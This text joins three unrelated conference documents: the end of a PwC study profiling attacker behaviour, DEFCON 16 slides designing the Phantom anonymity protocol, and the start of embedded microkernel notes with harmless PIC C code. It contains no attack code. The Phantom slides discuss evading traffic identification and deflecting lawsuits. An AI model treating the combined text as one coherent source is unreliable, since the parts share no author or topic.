• Randomising ordering of command switches
• Switching up tools used e.g. wget instead of curl; vi instead of
nano; less instead of cat
PwC │ 84
Threats to validity
• Very small sample
• Not real-world data
• Attackers were willing volunteers
• Knew they had permission, with no risk of reprisal
• Linux only
• One scenario (low-priv shell)
• Attackers may not always want/need to escalate
PwC │ 85
• Topics for future research
• Collaboration
• Conclusion
• References
Summary
PwC │ 86
Future research
• Explore effects of expertise and temporal proximity
• Further research into metadata variables for mistakes
• Real-world data
• Stochastic analysis
• Greater environmental and scenario diversity
• Real-time or near real-time automation
PwC │ 87
Collaboration
• Get in touch if you want to discuss
• @darkartlab
• [email protected]
PwC │ 88
Conclusion
• Small, novel study
• Some promising results
• Significant implications for defenders/investigators
• As well as implications for privacy
• Needs further investigation
PwC │ 89
References
Alison, L.J., Snook, B. and Stein, K.L., 2001. Unobtrusive measurement: Using police information for forensic research. Qualitative Research, 1(2), 241-254.
Bateman, A.L. and Salfati, C.G., 2007. An examination of behavioral consistency using individual behaviors or groups of behaviors in serial homicide. Behavioral Sciences & the Law, 25(4),
527-544.
Bennell, C. and Canter, D.V., 2002. Linking commercial burglaries by modus operandi: Tests using regression and ROC analysis. Science & Justice, 42(3), 153-164.
Bennell, C. and Jones, N.J., 2005. Between a ROC and a hard place: A method for linking serial burglaries by modus operandi. Journal of Investigative Psychology and Offender Profiling,
2(1), 23-41.
Bouhana, N., Johnson, S.D. and Porter, M., 2014. Consistency and specificity in burglars who commit prolific residential burglary: Testing the core assumptions underpinning behavioural
crime linkage. Legal and Criminological Psychology, 21(1), 77-94.
Caliskan-Islam, A., Yamaguchi, F., Dauber, E., Harang, R., Rieck, K., Greenstadt, R. and Narayanan, A., 2015. When Coding Style Survives Compilation: Deanonymizing Programmers from
Executable Binaries. arXiv preprint arXiv:1512.08546.
Canter, D., 1995. Psychology of offender profiling. Handbook of psychology in legal contexts (1994).
Canter, D., 2000. Offender profiling and criminal differentiation. Legal and Criminological Psychology, 5(1), 23-46.
Chiesa, R., Ducci, S. and Ciappi, S., 2008. Profiling hackers: the science of criminal profiling as applied to the world of hacking (Vol. 49). CRC Press.
Clark, D.D. and Landau, S., 2011. Untangling attribution. Harv. Nat'l Sec. J., 2
Craik, M. and Patrick, A., 1994. Linking serial offences. Policing London 10
data.worldbank.org/indicator/SE.ADT.LITR.ZS, accessed 27/06/2018
PwC │ 90
References
Donald, I. and Canter, D., 1992. Intentionality and fatality during the King's Cross underground fire. European journal of social psychology, 22(3), 203-218.
Douglas, J.E. and Munn, C., 1992. Violent crime scene analysis: Modus operandi, signature and staging. FBI Law Enforcement Bulletin, 61(2).
Filippoupolitis, A., Loukas, G. and Kapetanakis, S., 2014. Towards real-time profiling of human attackers and bot detection.
http://gala.gre.ac.uk/14947/1/14947_Loukas_Towards%20real%20time%20profiling%20(AAM)%202014..pdf, accessed 05/07/2018.
Freyd, Jennifer J., 1996. Betrayal Trauma: The Logic of Forgetting Childhood Abuse. Cambridge: Harvard University Press.
Furr, R.M. and Funder, D.C., 2004. Situational similarity and behavioral consistency: Subjective, objective, variable-centered, and person-centered approaches. Journal of Research in
Personality, 38(5), 421-447.
github.com/NetSPI/skl, accessed 27/06/2018
Grubin, D., Kelly, P. and Brunsdon, C., 2001. Linking serious sexual assaults through behaviour (Vol. 215). Home Office, Research, Development and Statistics Directorate.
Guitton, C., 2012. Criminals and cyber attacks: The missing link between attribution and deterrence. International Journal of Cyber Criminology, 6
Halligan, S. L., Michael, T., Clark, D. M., & Ehlers, A. (2003). Posttraumatic stress disorder following assault: The role of cognitive processing, trauma memory, and appraisals. Journal of
consulting and clinical psychology, 71(3)
Harbort, S. and Mokros, A., 2001. Serial Murderers in Germany from 1945 to 1995: A Descriptive Study. Homicide Studies, 5(4), 311-334.
Hettema, J. and Hol, D.P., 1998. Primary control and the consistency of interpersonal behaviour across different situations. European journal of personality, 12(4), 231-247.
Hunker, J., Hutchinson, B. and Margulies, J., 2008. Role and challenges for sufficient cyber-attack attribution. Institute for Information Infrastructure Protection 5-10.
Hutchins, E.M., Cloppert, M.J. and Amin, R.M., 2011. Intelligence-driven computer network defense informed by analysis of adversary campaigns and intrusion kill chains. Leading Issues
in Information Warfare & Security Research, 1
Landreth, B., 1985. Out of the inner circle: A hacker guide to computer security. Microsoft Press.
PwC │ 91
References
Mejia, E.F., 2014. Act and actor attribution in cyberspace: a proposed analytic framework. Air Univ Maxwell AFB AL Strategic Studies Quarterly.
Mischel, W. and Shoda, Y., 1995. A cognitive-affective system theory of personality: reconceptualizing situations, dispositions, dynamics, and invariance in personality structure.
Psychological review, 102(2)
Mischel, W., 1999. Personality coherence and dispositions in a cognitive-affective personality system (CAPS) approach. In: The coherence of personality: Social-cognitive bases of
consistency, variability, and organization (eds. Cervone and Shoda), 37-60.
Mokros, A. and Alison, L.J., 2002. Is offender profiling possible? Testing the predicted homology of crime scene actions and background characteristics in a sample of rapists. Legal and
Criminological Psychology, 7(1), 25-43.
Moran, N. and Bennett, J., 2013. Supply Chain Analysis: From Quartermaster to Sun-shop (Vol. 11). FireEye Labs.
Pervin, L.A., 2002. Current controversies and issues in personality. 3rd ed. John Wiley & Sons.
Ramsbrock, D., Berthier, R. and Cukier, M., 2007, June. Profiling attacker behavior following SSH compromises. In 37th Annual IEEE/IFIP international conference on dependable systems
and networks (DSN'07) 119-124
Raynal, F., Berthier, Y., Biondi, P. and Kaminsky, D., 2004. Honeypot forensics, Part II: analyzing the compromised host. IEEE security & privacy, 2(5), 77-80.
Rid, T. and Buchanan, B., 2015. Attributing cyber attacks. Journal of Strategic Studies, 38(1-2), 4-37
Salles-Loustau, G., Berthier, R., Collange, E., Sobesto, B. and Cukier, M., 2011, December. Characterizing attackers and attacks: An empirical study. In Dependable Computing (PRDC), 2011
IEEE 17th Pacific Rim International Symposium on Dependable Computing 174-183
Shaw, E., Ruby, K. and Post, J., 1998. The insider threat to information systems: The psychology of the dangerous insider. Security Awareness Bulletin, 2(98), 1-10.
Shoda, Y., Mischel, W. and Wright, J.C., 1994. Intraindividual stability in the organization and patterning of behavior: incorporating psychological situations into the idiographic analysis of
personality. Journal of personality and social psychology, 67(4)
PwC │ 92
References
Slater, C., Woodhams, J. and Hamilton-Giachritsis, C., 2015. Testing the Assumptions of Crime Linkage with Stranger Sex Offenses: A More Ecologically-Valid Study. Journal of
Police and Criminal Psychology, 30(4), 261-273.
Sorochinski, M. and Salfati, C.G., 2010. The consistency of inconsistency in serial homicide: Patterns of behavioural change across series. Journal of Investigative Psychology and
Offender Profiling, 7(2), 109-136.
Swets, J.A., 1988. Measuring the accuracy of diagnostic systems. Science, 240(4857), 1285-1293.
Symantec, 2011. W32.Duqu: The precursor to the next Stuxnet. Symantec Corporation, California, USA. Available from
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
Tonkin, M., Grant, T. and Bond, J.W., 2008. To link or not to link: A test of the case linkage principles using serial car theft data. Journal of Investigative Psychology and Offender
Profiling, 5(1‐2), 59-77.
Watters, P.A., McCombie, S., Layton, R. and Pieprzyk, J., 2012. Characterising and predicting cyber attacks using the Cyber Attacker Model Profile (CAMP). Journal of
Money Laundering Control, 15(4), 430-441.
Wheeler, D.A. and Larsen, G.N., 2003. Techniques for cyber attack attribution (No. IDA-P-3792). Institute for Defense Analyses, Alexandria, VA, USA.
Woodhams, J. and Grant, T., 2006. Developing a categorization system for rapists’ speech. Psychology, Crime & Law, 12(3), 245-260.
Woodhams, J. and Labuschagne, G., 2012. A test of case linkage principles with solved and unsolved serial rapes. Journal of Police and Criminal Psychology, 27(1), 85-98.
Zayas, V., Shoda, Y. and Ayduk, O.N., 2002. Personality in context: An interpersonal systems perspective. Journal of personality, 70(6), 851-900.
PwC │ 93
At PwC, our purpose is to build trust in society and solve important problems. We’re a network of firms in 157 countries with more than 223,000 people who are committed to delivering quality in assurance, advisory and tax services. Find out more and tell
us what matters to you by visiting us at www.pwc.com.
This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act upon the information contained in this publication without obtaining specific professional advice. No
representation or warranty (express or implied) is given as to the accuracy or completeness of the information contained in this publication, and, to the extent permitted by law, PricewaterhouseCoopers LLP, its members, employees and agents do not
accept or assume any liability, responsibility or duty of care for any consequences of you or anyone else acting, or refraining to act, in reliance on the information contained in this publication or for any decision based on it.
© 2018 PricewaterhouseCoopers LLP. All rights reserved. In this document, "PwC" refers to the UK member firm, and may sometimes refer to the PwC network. Each member firm is a separate legal entity. Please see www.pwc.com/structure for further
details.
Design services 31310_PRES_04/18
@darkartlab
[email protected]
Thoughts, questions, feedback: | pdf |
Generic, Decentralized, Unstoppable Anonymity:
The Phantom Protocol
DEFCON 16 Presentation
Magnus Bråding 2008
Short Author Presentation
Magnus Bråding
• Swedish security researcher (Fortego Security)
• 10+ years in the security business
• Central contributor and driving force behind
woodmann.com reverse engineering community
Project Background
(why is this interesting?)
Big upswing in anti online privacy measures during last couple of years
•
Huge pressure from media companies
•
ISPs tracking and throttling arbitrary traffic
•
Data retention laws
•
Draconian laws for tracking and punishing P2P users
•
Abuse and misuse of global network blacklists, under the cover of being
”child porn” related, while in reality being much more arbitrary censorship
•
Recent EU law proposal to register, track and regulate all bloggers!
•
Dictatorships and other regimes with oppressed people censoring and
tracking Internet use on an increasingly larger scale
A huge upcoming demand for anonymity seems unavoidable!
Existing anonymization solutions are in many ways not well suited for
this upcoming demand and the circumstances surrounding it
There is no real “standard” for anonymization, like BitTorrent is for P2P
A perfect opportunity to get it right with a new solution, from the start!
Goals of the Project
To be a good reference for future work within the
field of anonymization
To inspire further discussion about the optimal
requirements for the future anonymization demand
To be a starting point and inspiration for the
design and development of a global de facto
standard for generic anonymization
Not to be a complete detailed specification ready
to be implemented, but rather to be built upon
Limitations
The protocol is designed to work in any network
environment as long as no single attacker is able
to eavesdrop all participating nodes in a
correlated fashion, or directly controls a large
majority of all nodes in the network
• Such an attacker will still never be able to see what
participating nodes are talking about though, only who
they are communicating with
• The protocol also contains built-in countermeasures to
protect against attackers that are only able to monitor
parts of the network
Further Assumptions and Directives
Arbitrary random peers in the network are
assumed to be compromised and/or adverse
CPU power, network bandwidth, working memory
and secondary storage resources are all relatively
cheap, and will all be available in ever increasing
quantity during coming years and thereafter
• Thus, wherever a choice must be made between better
security or better performance / lower resource
consumption, the most secure alternative should be
chosen (within reasonable bounds, of course)
Design Goals
Design Goal Overview
Very important with well thought-out design
goals, this is at least half the work in any
successful project!
The design goals are stipulated with the
requirements and demand of today and the
future in mind
Design Goal Overview
Eight primary design goals:
1. Complete decentralization
2. Maximum DoS resistance
3. Theoretically secure anonymization
4. Theoretically secure end-to-end encryption
5. Complete isolation from the ”normal” Internet
6. Protection against protocol identification
7. High Traffic Volume and Throughput Capability
8. Generic, Well-Abstracted and Backward Compatible
Design Goal #1:
Complete Decentralization
No central or weak points can exist
They will be targeted
• Legally
• Technically (DoS attacks, takedowns etc)
Both ownership and technical design must
be decentralized
• Open/community owned design & source code
Design Goal #2:
Maximum DoS Resistance
The only way to stop a decentralized
system without any legal owners is to DoS it
It only takes one weakness, so defensive
thinking must be applied throughout all
levels of the design
Design Goal #3:
Theoretically Secure Anonymization
Nothing should be left to chance
No security by obscurity
All anonymization aspects should be able
to be expressed as a risk probability or a
theoretical (cryptographic) proof
Design Goal #4:
Theoretically Secure End-to-End Encryption
Confidentiality is not only important by
itself, but also directly important to
anonymity!
• Eavesdropped communication is highly likely to
contain information of more or less identifying
nature at some point!
Even if someone would monitor and
correlate all traffic at all points in the entire
network, they should not be able to see
what is communicated, no matter what
Design Goal #5:
Isolation from the "Normal" Internet
Users should not have to worry about Internet
crimes being perpetrated from their own IP
address
An isolated network is necessary to be able to
enforce end-to-end encryption for generic traffic
Using an isolated network has many advantages,
but not so many disadvantages in the end
Out-proxies to the ”normal” Internet can still be
implemented on the application level, selectively
Design Goal #6:
Protection against Protocol Identification
Many powerful interests will lobby against
a protocol like this, both to lawmakers and
ISPs (who are already today filtering traffic)
The harder it is made to positively identify
the usage of the protocol, the harder it will
be to track, filter and throttle it
Design Goal #7:
High Volume / Throughput Capacity
The traffic volume for ”normal usage” of the
Internet increases every day
More or less high speed / throughput is
necessary for many Internet applications
Popularity will be proportionally related to
transfer speed and volume
Anonymity is directly related to popularity
A generic system is practically always
superior to a specific system in the long run
A well-abstracted system allows for
efficient, distributed design and
implementation
A system compatible with all pre-existing
network enabled applications will get a
much quicker takeoff and community
penetration, and will have a much larger
potential
Design Goal #8:
Generic, Well-Abstracted and Backward Compatible
A Bird’s-Eye View
β
α
The Basic Idea
_
!
IP address of α =
5.6.7.8
!
IP address of β =
1.2.3.4
?
IP address of β =
???????
?
IP address of α =
???????
More About the Idea
α
β
Each anonymized node prepares its own
”routing path”, which is a series of nodes
ready to route connections and data for it
If two anonymized nodes want to communicate,
it is done by creating an interconnection
between their individual routing paths
Routing Paths
β
α
Each anonymized node decide the size and
composition of their own routing paths, affecting
both the strength of anonymity provided by
them, and their maximum throughput capacity
High Level Design
Routing Path - Generalization
Anonymized
node
Intermediate
node
Arbitrarily many more
intermediate nodes
Terminating
intermediate
node
α
Routing Tunnels
Anonymized
node
Intermediate
node
Arbitrarily many more
intermediate nodes
Terminating
intermediate
node
α
Whenever the anonymized node wants to
establish a connection to another node, a ”routing
tunnel” is set up inside the already existing
routing path
Such a routing tunnel is set up relatively quick, and will then
be connected to another routing tunnel inside another
routing path, to form a complete anonymized connection
Routing Tunnels
Anonymized
node
Intermediate
node
Arbitrarily many more
intermediate nodes
Terminating
intermediate
node
α
Such a routing tunnel is set up relatively quick, and will then
be connected to another routing tunnel inside another
routing path, to form a complete anonymized connection
AP Addresses
”Anonymous Protocol” addresses
Equivalent to IP addresses in their format
Equivalent to IP addresses in functionality,
with the exception that they allow
communication between two peers without
automatically revealing their identity
Backward compatible with IP applications
The Network Database
Equivalent to the routing tables of the ”normal”
Internet
Distributed and decentralized database based on
DHT (Distributed Hash Table) technology
• Proven technology
• Automatic resilience to constantly disappearing and
newly joining nodes
• Automatic resilience to malicious nodes of some kinds
The network nodes are the database
Design Details
Secure Routing Path Establishment
X
X
X
Y
Y
Y
Y
Y
Y2
Y4
Y1
Y8
X5
X7
X3
Y6
α
First, the nodes that will constitute the routing
path are selected by the anonymized node
A set of temporary ”helper
nodes” are then also selected
All the selected nodes are
then ordered into a sequence
The selection of the order of nodes in the sequence must
obey the following rules:
•No two X-nodes can be adjacent to each other
•A Y-node should be located in one end of the sequence
•A number of Y-nodes equal to the total number of X-
nodes minus one, should be located adjacent to each
other in the other end of the sequence
•One end of the sequence should be chosen at random to
be the beginning of the sequence
Secure Routing Path Establishment
Y1
Y2
X3
Y4
X5
Y6
X7
Y8
α
A ”goodie box” is prepared for
each node, by the anonymized node
Secure Routing Path Establishment
Y1
Y2
X3
Y4
X5
Y6
X7
Y8
X3
X5
X7
α
Another round is started, with a new
goodie box for each participating node
Secure Routing Path Establishment
Repeat
α
The routing path is now
securely established!
The Goodie Box
•
The routing path construction certificate
•
IP address and port number of next/previous nodes
•
Random IDs of next/previous node connections
•
Communication certificate of next/previous nodes
•
Seeds and params for dummy package creation
•
Seeds and params for stream encryption keys
•
Flags
•
A secure hash of the entire (encrypted) setup
package array in currently expected state
•
A secure cryptographic hash of the (decrypted)
contents of the current setup package
•
A signed routing table entry,
for the AP address
associated with the routing
path
Second round extras:
Secure Routing Tunnel Establishment
(outbound)
=
=
α
The anonymized node wants to establish a
connection to a certain AP address
It begins by sending a notification
package through the routing path
Secure Routing Tunnel Establishment
(outbound)
=
=
!
α
A new set of connections are created for the
tunnel, and a reply package is sent through these
The reply package enables the anonymized node to derive
the keys of all the intermediary nodes, while it is
impossible for any of them to derive any key with it
themselves
Secure Routing Tunnel Establishment
(outbound)
α
The anonymized node informs the exit node
of the desired AP address to connect to
The exit node performs the connection, and confirms a
successful connection back to the anonymized node
Secure Routing Tunnel Establishment
(outbound)
α
Repeat
The connection is fully established at both ends, and
the application layer can now start communicating over
it!
Secure Routing Tunnel Establishment
(inbound)
=
=
=
!
α
An incoming connection request arrives to
the entry node of the routing path
The entry node sends an initialization
package to the anonymized node
The initialization package enables the anonymized node to
immediately derive the keys of all the intermediary nodes, while it
is impossible for any of them to derive any key with it themselves
Secure Routing Tunnel Establishment
(inbound)
=
=
=
α
A new set of connections are created for the
tunnel, and a reply package is sent through these
The entry node confirms the
connection to the external peer
Secure Routing Tunnel Establishment
(inbound)
α
It then confirms a successful connection
back to the anonymized node
Secure Routing Tunnel Establishment
(inbound)
α
Repeat
The connection is now fully established at both ends,
and the application layer can start communicating over it!
To achieve symmetry with outbound connections
though, a dummy package is first sent over the tunnel
This symmetry is important!
Secure End-to-End Encryption
Once a full anonymized end-to-end
connection has been established between
two peers, double authenticated SSL can
be used over it, as a final layer of
encryption / authentication
The used certificates can be stored in the
network database, in the individual entries
for each AP address
IP Backward Compatibility
Identical format and functionality of IP
• Address format
• Port semantics
• Connection semantics
Binary hooks for all common network APIs
• No need for any application author assistance
• No need for any application source code
• The application won’t even know that its anonymized
The common Internet DNS system can be used
Simple to start supporting IPv6 and similar too
The Network Database
Contains separate tables
• Node IP address table, with associated info
• Node AP address table, with associated info
The database can be accessed through a specific strict API
Voting algorithms, digital signatures and enforced entry
expiry dates are used on top of the standard DHT
technology in some cases, to help enforce permissions
and protect from malicious manipulation of database
contents and query results
Resilient to ”net splits”
Manual Override Command Support
Powerful emergency measure
• Protection against DoS attacks
• Restoration after possible more or less successful DoS attacks
• Protection against known malicious nodes
Signed commands can be flooded to all clients
• Many DHT implementations natively support this feature
• Commands signed by trusted party, e.g. project maintainers etc
• Verification certificate hard coded into the client application
Only commands for banning IP addresses, manually edit
the network database etc, never affecting client computers!
No real worry if signing keys would leak or be cracked
• A minor update of the client could immediately be released, with a
new key (verification certificate) hard coded into it, problem solved
High-Availability Routing Paths
X2a
X3a
X1e
X2e
X3e
X3b
X2b
X1b
X1d
X2d
X3d
X3c
X2c
X1c
X3g
X2g
X1g
X1f
X2f
X3f
Aftermath
Legal Aspects & Implications
File sharing example:
1.
Today: Lawsuits based on people connecting to a
certain torrent
2.
Lawsuits based on people using a certain file sharing
program / protocol
3.
Lawsuits against endpoints in anonymization networks
4.
Lawsuits against routers on the Internet?
5.
Lawsuits based on people using a generic
anonymization protocol
6.
Lawsuits based on people using cryptography?
7.
Lawsuits based on people using the Internet?
Legal Aspects & Implications
License trickery?
•
A license for the main specification, saying that a certain EULA
must accompany all implementations of the protocol
•
The EULA in turn, would say that through using the protocol
implementation in question, the user:
–
Understands and agrees to that no node in the anonymous network
can be held responsible for any of the data that is being routed
through it, due to the simple fact that the user neither has any
control over what such data may contain, nor any possibility
whatsoever to access the data itself
–
Agrees to not use the protocol implementation to gather data that
can or will be used in the process of filing a lawsuit against any of
the network users that are just routing data
•
Probably won’t work in many ways and several countries, but still
an interesting line of thought to be investigated further
Review of Design Goals
Review of our eight original design goals:
1. Complete decentralization
2. Maximum DoS resistance
3. Theoretically secure anonymization
4. Theoretically secure end-to-end encryption
5. Complete isolation from the ”normal” Internet
6. Protection against protocol identification
7. High Traffic Volume and Throughput Capability
8. Generic, Well-Abstracted and Backward Compatible
Review of Design Goal #1:
Complete Decentralization
The protocol design has no central points,
or even nodes that are individually more
valuable to the collected function of the
anonymous network than any other
Thus there are no single points of the
network to attack, neither technically nor
legally, in order to bring down any other
parts of the network than those exact ones
attacked
Review of Design Goal #2:
Maximum DoS Resistance
DoS resistance has been a concern during
the entire design process, and has limited
possible attack vectors substantially
Can always be improved though
Must continue to be a constant area of
concern and improvement for future
development
Review of Design Goal #3:
Theoretically Secure Anonymization
All involved risk probabilities can be
expressed in terms of other known
probabilities
All security is based on cryptography and
randomness, never on obscurity or chance
Hopefully no gaping holes have been left to
chance, but review and improvements are
of course needed, as always in security
Review of Design Goal #4:
Theoretically Secure End-to-End Encryption
All data is encrypted in multiple layers with
well-known and trusted algorithms,
protecting it from all other nodes except the
communicating peers
All connections are wrapped by SSL, so
the protection from external eavesdroppers
should under all circumstances be at least
equivalent to that of SSL
Review of Design Goal #5:
Isolation from the "Normal" Internet
It is impossible to contact and communicate with
any regular IP address on the Internet from inside
the anonymous network
The network can therefore not be used to
anonymously commit illegal acts against any
computer that has not itself joined and exposed
services to the anonymous network, and thus
accepted the risks involved in anonymous
communication for these
Review of Design Goal #6:
Protection against Protocol Identification
SSL connections are used as an external shell for all
connections used by the protocol, and by default they also
use the standard web server SSL port (tcp/443)
Thus, neither the port number nor any of the contents of
the communication can be directly used to distinguish it
from common secure web traffic
There are of course practically always enough advanced
traffic analysis methods to identify certain kinds of traffic,
or at least distinguish traffic from a certain other kind of
traffic, but if this is made hard enough, it will take up too
much resources or produce too many false positives to be
practically or commercially viable
Review of Design Goal #7:
High Volume / Throughput Capacity
There is no practical way for a node to know if it is
communicating directly with a certain node, or
rather with the terminating intermediate node of
one of the routing paths owned by this node
Intermediate nodes will never know if they are
adjacent to the anonymized node in a path or not
Thus, single point-to-point connections between
two nodes on the anonymous network, without
any intermediate nodes at all (or with very few
such), can be used while still preserving a great
measure of anonymity, and/or ”reasonable doubt”
The protocol supports arbitrary network
communication, i.e. generic anonymization
The protocol design is abstracted in a way that
each individual level of the protocol can be
exchanged or redesigned without the other parts
being affected or having to be redesigned at the
same time
The protocol emulates / hooks all TCP network
APIs, and can thus be externally applied to any
application that uses common TCP communication
Review of Design Goal #8:
Generic, Well-Abstracted and Backward Compatible
Comparison with Other Anonymization
Solutions
Advantages of Phantom over TOR
• Designed from the ground up with current and future
practical anonymization needs and demand in mind
• Compatible with all existing and future network enabled
software, without any need for adaptations or upgrades
• Higher throughput
• No traffic volume limits
• Isolated from the ”normal” Internet
• End-to-end encryption
• Better prevents positive protocol identification
• Not vulnerable to ”DNS leak” attacks and similar
Comparison with Other Anonymization
Solutions
Advantages of Phantom over I2P
• Compatible with all existing and future network enabled
software, without any need for adaptations or upgrades
• Higher throughput
• End-to-end encryption
• Better prevents positive traffic analysis identification
Comparison with Other Anonymization
Solutions
Advantages of Phantom over anonymized P2P
• Less likely to be target of “general ban”
• The generic nature of Phantom opens up infinitely much
more potential than just binding the anonymization to a
single application or usage area
Known Weaknesses
1.
If all the nodes in a routing path are being
controlled by the same attacker, this attacker
can bind the anonymized node to the entry/exit
node
–
No data can still be eavesdropped though, only what AP
addresses it communicates with can be concluded
–
One very important detail is that it will be very hard for the
attacker to conclusively know that its nodes actually
constitute the entire path, since the last attacker controlled
node will never be able to determine if it is actually
communicating with the anonymized node itself, or with just
yet another intermediate node in the routing path
–
The algorithms for routing path node selection can be
optimized to minimize the risk of such a successful attack
Known Weaknesses
2. If an attacker monitors the traffic of all
nodes in the network, it will be able to
conclude the same thing as in the
previous weakness, without even having
to doubt where the routing paths end
–
This has been stated as a limitation from the start though
–
Some anonymization protocols try to counter such attacks by
delaying data and sending out junk data, but this goes
against the high throughput design goal of Phantom
Known Weaknesses
3.
Individual intermediate nodes in a routing path
could try to communicate their identity to other
non-adjacent attacker controlled intermediate
nodes in the same routing path, by means of
different kinds of covert channels
–
Examples of such covert channels could be information
encoding using timing or chunk size for communicated data
–
Could be countered to some degree by micro delays and
data chunk size reorganization in intermediate nodes, but
very hard to defend against completely
–
Again though, very hard for the attacker to conclusively know
where in the path its nodes are located, since they will never
be able to determine if they are communicating with another
intermediate node or not, or even the direction of the path
Summary
There is no complete specification of the Phantom protocol
ready for immediate implementation
The main goals of this project is rather to:
• Explore the optimal requirements for an anonymization solution of
today and future years
• Provide examples of solutions for problems likely to be associated
with these requirements
• Inspire discussions about the design of such a system
• Be the starting point of an open de facto standard for free, secure
and ubiquitous Internet anonymization
Please see the Phantom white paper for more details:
• http://www.fortego.se/phantom.pdf
Future of Phantom
A Google Code repository, wiki and
discussion group has been reserved for the
project, which will hopefully be able to work
as a central coordinating location for future
design, development and implementation of
the Phantom protocol and the ideas
inspired by it:
http://code.google.com/p/phantom
Questions / Discussion
If you come up with a question later on, feel free to ask me over a
beer, or to contact me by email!
[email protected] | pdf |
Microkernel development:
from project to implementation
Technical Notes
Rodrigo Maximiano Antunes de Almeida
[email protected]
Universidade Federal de Itajubá
Summary
This is the technical notes about the ESC talk: “Microkernel development: from project to
implementation” given by Rodrigo Maximiano Antunes de Almeida, from Unifei.
The talk consists of the design and implementation of a microkernel. The project will be developed on
ISO-C without the standard libraries, in such a way that the code to be presented to the participants can be
easily ported to any architecture and used as a basis for future projects. It will also be addressed the
standardization of the procedures and hardware requisitions, encapsulated as drivers. Upon completion, the
participants will have a better understanding about the kernel its advantages and restrictions.
This documents presents in deeper details some of the topics that will be covered in the speech, mainly
the theoretical ones.
License
This document is licensed under Creative Commons – Attribution – Non Commercial – Share Alike license. You're free to:
to Share — to copy, distribute and transmit the work
to Remix — to adapt the work
Under the following conditions:
Attribution — You must attribute the work (but not in any way that suggests that they endorse you or your use of the
work).
Noncommercial — You may not use this work for commercial purposes.
Share Alike — If you alter, transform, or build upon this work, you may distribute the resulting work only under the
same or similar license to this one.
Index
1
Developing an embedded system .................................................................................................................... 1
1.1
System connections ........................................................................................................................................ 1
2
System programming ....................................................................................................................................... 3
2.1
Making access to the hardware ...................................................................................................................... 3
2.2
Accessing individual bits ................................................................................................................................. 3
2.3
LCD communication ........................................................................................................................................ 4
2.4
Analog reading ................................................................................................................................................ 6
3
First embedded firmware ................................................................................................................................ 8
4
What is a kernel? ............................................................................................................................................. 9
5
Kernel components ........................................................................................................................................ 10
6
Kernel Project ................................................................................................................................................ 11
6.1
Why to develop our own kernel? .................................................................................................................. 11
6.2
Alternatives ................................................................................................................................................... 11
6.3
Monolithic kernel versus microkernel ........................................................................................................... 11
6.4
Kernel design decisions: ................................................................................................................................ 12
6.5
This course decisions..................................................................................................................................... 12
7
Concepts ........................................................................................................................................................ 13
7.1
Function pointers .......................................................................................................................................... 13
7.2
First example ................................................................................................................................................. 14
7.3
Structs ........................................................................................................................................................... 15
7.4
Circular buffers .............................................................................................................................................. 15
7.5
Second Example ............................................................................................................................................ 16
7.6
Temporal conditions ...................................................................................................................................... 19
7.7
Third Example ............................................................................................................................................... 20
8
The Kernel ...................................................................................................................................................... 23
9
Building the device driver controller ............................................................................................................. 26
9.1
Device Driver Pattern .................................................................................................................................... 26
9.2
Controller engine .......................................................................................................................................... 26
9.3
Using the controller engine ........................................................................................................................... 27
9.4
Interesting situations .................................................................................................................................... 28
9.5
Driver callback ............................................................................................................................................... 29
1
1 Developing an embedded system
An embedded system is a system designed for a specific propose that has a microcontroller or a
microprocessor as the central piece. The microcontroller has a software built exclusively to support the
functionalities underlined in the embedded product. In order to build an embedded system, we must account
for both hardware and software issues.
The hardware part is composed by a microcontroller and other circuits that are responsible to make the
interface between the microcontroller and the user or other microcontroller. The document that describes the
way these components are connected is called a schematic.
In this document we’re going to build a simple board with a microcontroller with a lcd. The way each of
them must be connected depends on each component. In general their manufactures send an application note
showing the default connection.
For the system we’re going to use a pic18f4550 as the microcontroller unit, a HD77480 as LCD output
interface and a regular potentiometer as input information.
1.1 System connections
For the required system the connections will be made as in the following schematic
This system can be connected using a protoboard as the image below.
2
3
2 System programming
In order to correctly program the system, a dedicated programmer will be used. This programmer need
some initial code to execute correctly. These codes are responsible to make the initial setup on the system.
#pragma config MCLRE=ON // Master Clear disable
#pragma config FOSC=INTOSC_XT // Internal oscilator
#pragma config WDT=OFF // Watchdog disbled
#pragma config LVP=OFF // Low voltage programming disabled
#pragma config DEBUG=OFF
#pragma config XINST=OFF // Don’t use new processor instructions
2.1 Making access to the hardware
All terminals are mapped in the RAM area. In order to access one terminal we need to first find the
terminal address and than make a pointer to this address. The PORTD for example is connected in the 0xF83
address.
void main (void){
char *ptr;
//pointing to the port D
ptr = 0xF83;
//changing all outputs to high
*ptr = 0xFF;
}
Another need to make the peripheral usable, the circuit direction must be defined as input or output. This
is achieved by the TRIS register. The code below can blink all the leds connected on the PORTD. In order to
simplify the port access a #define structure can be used to hide the pointer accesses.
#define PORTD (*(volatile __near unsigned char*)0xF83)
#define TRISD (*(volatile __near unsigned char*)0xF95)
void main(void) {
TRISD = 0x00;
for(;;){
PORTD ^= 0xFF;
}
}
2.2 Accessing individual bits
The address used is generally composed of eight bits, each one mapped to one terminal. In order to make
individual accessing we need to use some binary manipulation, using bitwise operations. These operations can
be made in a pseudo-function using the #define preprocessor
//using define
#define BitSet(arg,bit) ((arg) |= (1<<bit))
#define BitClr(arg,bit) ((arg) &= ~(1<<bit))
#define BitFlp(arg,bit) ((arg) ^= (1<<bit))
#define BitTst(arg,bit) ((arg) & (1<<bit))
4
2.3 LCD communication
The LCD communication will be made using only 4 bits of data. This enforces us to build a library witch can
run all the steps required by the LCD. The LCD data will be accessed using the PORTD bits 4, 5, 6 and 7. The
enable and register select pin will be accessed by the PORTC 6 and 7.
The LCD protocol requires some delays. As the delay time does not need to be precise we can use a simple
for loop to achieve the times.
void delayMicroseconds(int ms) {
int i;
for (; ms > 0; ms--) {
for (i = 0; i < 30; i++);
}
}
Another step in the communication is the data clock. This is achieved using the enable pin.
void pulseEnablePin() {
BitClr(PORTC, EN);
delayMicroseconds(1);
// send a pulse to enable
BitSet(PORTC, EN);
delayMicroseconds(1);
BitClr(PORTC, EN);
}
To send a byte, it is needed to send first the most significant 4 bits and than the last 4 significant bits.
void pushNibble(int value, int rs) {
PORTD = (value) << 4;
if (rs) {
BitSet(PORTC, RS);
} else {
BitClr(PORTC, RS);
}
pulseEnablePin();
}
void pushByte(int value, int rs) {
int val_lower = value & 0x0F;
int val_upper = value >> 4;
pushNibble(val_upper, rs);
pushNibble(val_lower, rs);
}
The difference between a command or a data is the value on register select pin.
5
void lcdCommand(int value) {
